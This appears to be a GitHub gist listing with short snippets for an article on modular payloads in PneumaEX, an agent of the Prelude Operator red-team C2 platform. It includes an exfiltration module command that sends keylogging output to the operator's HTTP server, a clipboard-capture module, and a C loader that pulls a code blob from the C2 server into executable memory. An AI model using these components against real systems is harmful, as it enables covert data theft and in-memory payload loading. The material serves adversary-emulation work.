Skip to content

Instantly share code, notes, and snippets.

View khyberspache's full-sized avatar
🖖

Alex Manners khyberspache

🖖
View GitHub Profile
@khyberspache
khyberspache / modular_command_args.yml
Created December 23, 2020 22:12
Example of argument passthrough to module for PneumaEX
command: |
module.exfil.httpServer.["#{operator.http}", "#{file.T1056.001}", "#{agent.name}", "#{operator.session}"]
@khyberspache
khyberspache / capabilities.go
Created December 23, 2020 22:11
Module capability definition file for PneumaEX
package main
import ()
var (
ModuleName = "collect"
Functions = map[string]func(args []string) ([]byte, int){
"captureClipboard": captureClipboard,
}
ExecFunctions = map[string]func(args string) (){
@khyberspache
khyberspache / payload_syntax.yml
Created December 23, 2020 22:10
Modular payloads syntax for Prelude Operator
#{operator.payloads}/path/to/payload/collect-windows.exe
#{operator.payloads}/path/to/payload/collect-linux
#{operator.payloads}/path/to/payload/collect-darwin
@khyberspache
khyberspache / module_syntax.yml
Created December 23, 2020 22:09
Module syntax for ability yaml file
module.collect.captureClipboard
@khyberspache
khyberspache / run_command.go
Created December 23, 2020 22:08
keyword usage example for Operator
func RunCommand(message string, executor string, payloadPath string) (string, int, int) {
if executor == "keyword" {
switch message {
case "stop agent":
os.Exit(0)
case "module":
// do module stuff
default:
// do other stuff
}
@khyberspache
khyberspache / pie_blob_loader.c
Created December 23, 2020 22:07
Position Independent Executable loader example for article
// Request the pie_blob module from the C2 server
// mmap exectuable memory
fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// read the blob into memory
result = fread(fptr, 1, sb.st_size, pBlob);
// grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen)
handle = dlopen(LIBC_FILE, RTLD_LAZY);
@khyberspache
khyberspache / pie_blob.c
Created December 23, 2020 22:05
Position Independent Executable example for article
// example pie_blob.c
int f1(int v, void (* exit)(int)){
(*exit)(0);
return v;
}